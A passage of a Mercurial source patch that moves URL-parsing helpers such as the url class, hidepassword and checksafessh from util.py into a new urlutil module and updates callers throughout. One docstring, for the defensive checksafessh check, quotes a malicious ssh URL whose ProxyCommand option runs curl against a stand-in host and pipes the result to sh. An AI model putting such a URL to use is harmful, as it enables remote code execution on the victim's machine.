util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -85,6 +85,7 @@ hashutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -3404,7 +3405,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -662,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. """ - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -26,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -162,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -745,7 +746,7 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) peer = getpeer() try: @@ -765,7 +766,7 @@ else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) peer = getpeer() @@ -849,12 +850,12 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made to subrepo %s since last push to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) try: @@ -1284,7 +1285,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1582,7 +1583,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -23,7 +23,10 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') @@ -136,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -400,13 +403,13 @@ """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -435,7 +438,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -559,7 +559,7 @@ ) p = p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) c.alter(b"paths", n, p) diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,6 +56,7 @@ hashutil, procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -65,7 +65,6 @@ List, Optional, Tuple, - Union, ) @@ -2959,420 +2958,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - # type: (Union[bytes, int]) -> int - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. - """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> - >>> url(b'ssh://[::1]:2200//home/joe/repo') - <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> - >>> url(b'file:///home/joe/repo') - <url scheme: 'file', path: '/home/joe/repo'> - >>> url(b'file:///c:/temp/foo/') - <url scheme: 'file', path: 'c:/temp/foo/'> - >>> url(b'bundle:foo') - <url scheme: 'bundle', path: 'foo'> - >>> url(b'bundle://../foo') - <url scheme: 'bundle', path: '../foo'> - >>> url(br'c:\foo\bar') - <url path: 'c:\\foo\\bar'> - >>> url(br'\\blah\blah\blah') - <url path: '\\\\blah\\blah\\blah'> - >>> url(br'\\blah\blah\blah#baz') - <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> - >>> url(br'file:///C:\users\me') - <url scheme: 'file', path: 'C:\\users\\me'> - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> - >>> url(b'ssh://joe@x/repo') - <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - <url scheme: 'http', host: 'host', path: 'a?b#c'> - - Empty path: - - >>> url(b'') - <url path: ''> - >>> url(b'#a') - <url path: '', fragment: 'a'> - >>> url(b'http://host/') - <url scheme: 'http', host: 'host', path: ''> - >>> url(b'http://host/#a') - <url scheme: 'http', host: 'host', path: '', fragment: 'a'> - - Only scheme: - - >>> url(b'http:') - <url scheme: 'http'> - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # type: (bytes, bool, bool) -> None - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - def copy(self): - u = url(b'temporary useless value') - u.path = self.path - u.scheme = self.scheme - u.user = self.user - u.passwd = self.passwd - u.host = self.host - u.path = self.path - u.query = self.query - u.fragment = self.fragment - u._localpath = self._localpath - u._hostport = self._hostport - u._origpath = self._origpath - return u - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'<url %s>' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - # type: () -> bytes - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. - if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - # type: (bytes) -> bool - return bool(url(path).scheme) # cast to help pytype - - -def hasdriveletter(path): - # type: (bytes) -> bool - return bool(path) and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - # type: (bytes) -> bytes - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - # type: (bytes) -> None - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - # type: (bytes) -> bytes - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - # type: (bytes) -> bytes - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -5,6 +5,8 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. import os +import re as remod +import socket from ..i18n import _ from ..pycompat import ( @@ -12,12 +14,437 @@ setattr, ) from .. import ( + encoding, error, pycompat, - util, + urllibcompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. + + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. + + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> + >>> url(b'ssh://[::1]:2200//home/joe/repo') + <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> + >>> url(b'file:///home/joe/repo') + <url scheme: 'file', path: '/home/joe/repo'> + >>> url(b'file:///c:/temp/foo/') + <url scheme: 'file', path: 'c:/temp/foo/'> + >>> url(b'bundle:foo') + <url scheme: 'bundle', path: 'foo'> + >>> url(b'bundle://../foo') + <url scheme: 'bundle', path: '../foo'> + >>> url(br'c:\foo\bar') + <url path: 'c:\\foo\\bar'> + >>> url(br'\\blah\blah\blah') + <url path: '\\\\blah\\blah\\blah'> + >>> url(br'\\blah\blah\blah#baz') + <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> + >>> url(br'file:///C:\users\me') + <url scheme: 'file', path: 'C:\\users\\me'> + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> + >>> url(b'ssh://joe@x/repo') + <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + <url scheme: 'http', host: 'host', path: 'a?b#c'> + + Empty path: + + >>> url(b'') + <url path: ''> + >>> url(b'#a') + <url path: '', fragment: 'a'> + >>> url(b'http://host/') + <url scheme: 'http', host: 'host', path: ''> + >>> url(b'http://host/#a') + <url scheme: 'http', host: 'host', path: '', fragment: 'a'> + + Only scheme: + + >>> url(b'http:') + <url scheme: 'http'> + """ + + _safechars = b"!~*'()+" + _safepchars = b"/!~*'()+:\\" + _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match + + def __init__(self, path, parsequery=True, parsefragment=True): + # type: (bytes, bool, bool) -> None + # We slowly chomp away at path until we have only the path left + self.scheme = self.user = self.passwd = self.host = None + self.port = self.path = self.query = self.fragment = None + self._localpath = True + self._hostport = b'' + self._origpath = path + + if parsefragment and b'#' in path: + path, self.fragment = path.split(b'#', 1) + + # special case for Windows drive letters and UNC paths + if hasdriveletter(path) or path.startswith(b'\\\\'): + self.path = path + return + + # For compatibility reasons, we can't handle bundle paths as + # normal URLS + if path.startswith(b'bundle:'): + self.scheme = b'bundle' + path = path[7:] + if path.startswith(b'//'): + path = path[2:] + self.path = path + return + + if self._matchscheme(path): + parts = path.split(b':', 1) + if parts[0]: + self.scheme, path = parts + self._localpath = False + + if not path: + path = None + if self._localpath: + self.path = b'' + return + else: + if self._localpath: + self.path = path + return + + if parsequery and b'?' in path: + path, self.query = path.split(b'?', 1) + if not path: + path = None + if not self.query: + self.query = None + + # // is required to specify a host/authority + if path and path.startswith(b'//'): + parts = path[2:].split(b'/', 1) + if len(parts) > 1: + self.host, path = parts + else: + self.host = parts[0] + path = None + if not self.host: + self.host = None + # path of file:///d is /d + # path of file:///d:/ is d:/, not /d:/ + if path and not hasdriveletter(path): + path = b'/' + path + + if self.host and b'@' in self.host: + self.user, self.host = self.host.rsplit(b'@', 1) + if b':' in self.user: + self.user, self.passwd = self.user.split(b':', 1) + if not self.host: + self.host = None + + # Don't split on colons in IPv6 addresses without ports + if ( + self.host + and b':' in self.host + and not ( + self.host.startswith(b'[') and self.host.endswith(b']') + ) + ): + self._hostport = self.host + self.host, self.port = self.host.rsplit(b':', 1) + if not self.host: + self.host = None + + if ( + self.host + and self.scheme == b'file' + and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') + ): + raise error.Abort( + _(b'file:// URLs can only refer to localhost') + ) + + self.path = path + + # leave the query string escaped + for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): + v = getattr(self, a) + if v is not None: + setattr(self, a, urlreq.unquote(v)) + + def copy(self): + u = url(b'temporary useless value') + u.path = self.path + u.scheme = self.scheme + u.user = self.user + u.passwd = self.passwd + u.host = self.host + u.path = self.path + u.query = self.query + u.fragment = self.fragment + u._localpath = self._localpath + u._hostport = self._hostport + u._origpath = self._origpath + return u + + @encoding.strmethod + def __repr__(self): + attrs = [] + for a in ( + b'scheme', + b'user', + b'passwd', + b'host', + b'port', + b'path', + b'query', + b'fragment', + ): + v = getattr(self, a) + if v is not None: + attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) + return b'<url %s>' % b', '.join(attrs) + + def __bytes__(self): + r"""Join the URL's components back into a URL string. + + Examples: + + >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) + 